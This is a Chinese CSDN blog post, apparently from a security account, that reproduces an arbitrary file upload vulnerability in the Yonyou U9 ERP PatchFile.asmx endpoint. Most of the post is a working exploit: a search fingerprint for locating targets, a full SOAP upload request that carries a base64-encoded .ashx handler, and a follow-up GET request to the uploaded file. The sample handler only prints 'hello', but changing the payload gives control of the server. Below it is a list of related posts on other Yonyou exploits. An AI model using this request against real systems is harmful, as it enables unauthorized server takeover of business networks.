【漏洞复现】用友U9 patchfile存在任意文件上传漏洞

最新推荐文章于 2024-06-11 08:49:57 发布
最新推荐文章于 2024-06-11 08:49:57 发布
阅读量223 收藏 2
点赞数 7
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/137263137
版权

更多干货POC获取,请关注公众号:如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述 

      用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友U9 patchfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

Nx03 系统指纹
鹰图:web.body="logo-u9.png"

Nx04 产品主页

Nx05 漏洞复现

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64)
Content-Length: 885
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/SaveFile"

<?xml version="1.0" encoding="utf-8"?>
 <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
   <SaveFile xmlns="http://tempuri.org/">
    <binData>PCUgQCB3ZWJoYW5kbGVyIGxhbmd1YWdlPSJDIyIgY2xhc3M9IkF2ZXJhZ2VIYW5kbGVyIiAlPiAKdXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLldlYjsgCgpwdWJsaWMgY2xhc3MgQXZlcmFnZUhhbmRsZXIgOiBJSHR0cEhhbmRsZXIgCnsgCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIAogICAgeyAKICAgICAgICBnZXQgewogICAgICAgICAgICAgcmV0dXJuIHRydWU7IAogICAgICAgICAgICB9IAogICAgICAgIH0gCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY3R4KSAKICAgICAgICB7IAogICAgICAgICAgICBjdHguUmVzcG9uc2UuV3JpdGUoImhlbGxvIik7IAogICAgICAgIH0gCiAgICB9</binData>
    <path>./</path>
    <fileName>test.ashx</fileName>
   </SaveFile>
  </soap:Body>
 </soap:Envelope>

访问上传的位置

GET /CS/Office/AutoUpdates/test.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Cookie: .ASPXANONYMOUS=COEq2gdm3AEkAAAANjJmNWE5MWUtMjU1ZC00NzdjLTkxNTEtNDM5OWRjOWE1Nzc20; ASP.NET_SessionId=3wzfeojwxqywily1b4t1mqk0
Accept-Encoding: gzip, deflate

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞用友U9 UMWebService.asmx 任意文件读取漏洞
qq_67810151的博客
03-02 779
用友U9多组织企业互联网应用平台UMWebService.asmx存在任意文件读取漏洞。攻击者可以通过发送特定的请求,利用该漏洞获取系统敏感文件
用友u8c-CacheInvokeServlet-反序列化rce漏洞-day漏洞(未公开)
weixin_43167326的博客
01-20 601
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修了一个存在用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
用友系统-U9企业版存在任意文件漏洞(新接口)-漏洞挖掘
wuli1024的博客
01-31 1349
近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+
用友 U9 抛异常代码
weixin_30376163的博客
07-05 337
throw new Exception(“”) 转载于:https://www.cnblogs.com/Xanthus/p/11136906.html
用友U9 PatchFile.asmx 任意文件漏洞
weixin_52204925的博客
01-29 663
用友U9 PatchFile.asmx 任意文件漏洞
用友U9 存在PatchFile.asmx接口任意文件漏洞
wan___she__pi的博客
04-07 523
用友U9是由中国用友软件股份有限公司开发的一款企业级管理软件。它是用友软件公司旗下的一款ERP(企业资源计划)软件,旨在帮助企业实信息化管理和提升运营效率。提供了广泛的功能模块,包括财务管理、采购管理、销售管理、生产管理、仓储管理、人力资源管理、供应链管理等。它支持多行业、多业务模式的企业使用,并可以根据企业的需求进行个性化定制。用友U9 存在PatchFile.asmx接口任意文件漏洞
node-patchfile:给定差异的补丁文件
03-26
补丁文件给定差异的补丁文件。安装npm i patchfile如何使用? const daffy = require ( 'daffy' ) ;const patchfile = require ( 'patchfile' ) ;const patch = daffy . createPatch ( 'hello' , 'hello world' ) ;...
NodePatcher:用于修补二进制文件的Node.js脚本
05-15
node nodepatcher.js patchfile.txt input.dat Output: input.dat.new replaces.log input.dat.new - patched version 补丁文件格式 Example: #Persistent License Check 0xEB83 0x00 0x01 #Initial License Check ...
差分文件工具bsdiff-v4.3-win-x64
03-27
Android差分apk工具, 差分升级使用。 使用命令  1.计算差分包:bsdiff.exe oldfile newfile patchfile  2.合并差分包:bspatch.exe oldfile newfile patchfile 也可用于其它文件
!!!!ap6212a0_a33_sc3817r_验证通过_修正wifi的配置文件为nvram_ap6212.txt
07-03
(以后重新解压缩SDK的时候,直接导入这个.config文件即可!) 2、(这个不修改:) Q:\a33\ap6212a0_a33_sc3817r\android\device\softwinner\astar-y3\overlay\frameworks\base\core\res\res\values\config.xml...
ap6212a0_a33_sc3817r_神舟验证版本_借用nvram_ap6210这个配置文件_20170626_1834没有外层目录.7z
06-26
调通sina33下的AP6212A0(WIFI+BT) 大文实验室/大文哥 壹捌陆捌零陆捌捌陆捌贰 ...完成时间:2017/6/26 11:01 版本:V1.1 本文参照: 《A33 wifi移植说明书.pdf》 还有就是全志R16的parrotv1.1的官方SDK(Android...
用友U9 PatchFile.asmx 任意文件漏洞
0xSec
01-29 744
用友U9 PatchFile.asmx接口处存在文件漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友GRP-U8 U8AppProxy任意文件漏洞+利用
0xSec
03-21 5278
用友 GRP-U8 U8AppProxy接口存在任意文件漏洞,攻击者通过漏洞可以获取服务器权限。
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1222
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中漏洞查找过程。
用友 U9 常用的东西
weixin_30448685的博客
07-09 258
系统资源 数据字典 UI组件 UI参照组件 BE组件 BP组件 SV组件 转载于:https://www.cnblogs.com/Xanthus/p/11160851.html
致远(用友)OA或M1 漏洞
ccz4854的博客
08-09 4855
致远OA通过发送特殊请求获取session,在通过文件接口上特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
等保测评和安全运维
weixin_64392888的博客
06-11 652
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
最新发布
大龄IT民工
06-11 1411
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发恶意流量后,应用可根据细粒度的检测判断是否出恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
patch命令如何跳过存在文件
03-22
如果存在同名文件,可以使用-p选项来跳过。例如,使用以下命令跳过已存在文件: patch -p1 -N < patchfile 其中,-p1选项表示要跳过路径中的第一个目录,-N选项表示要跳过已存在文件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值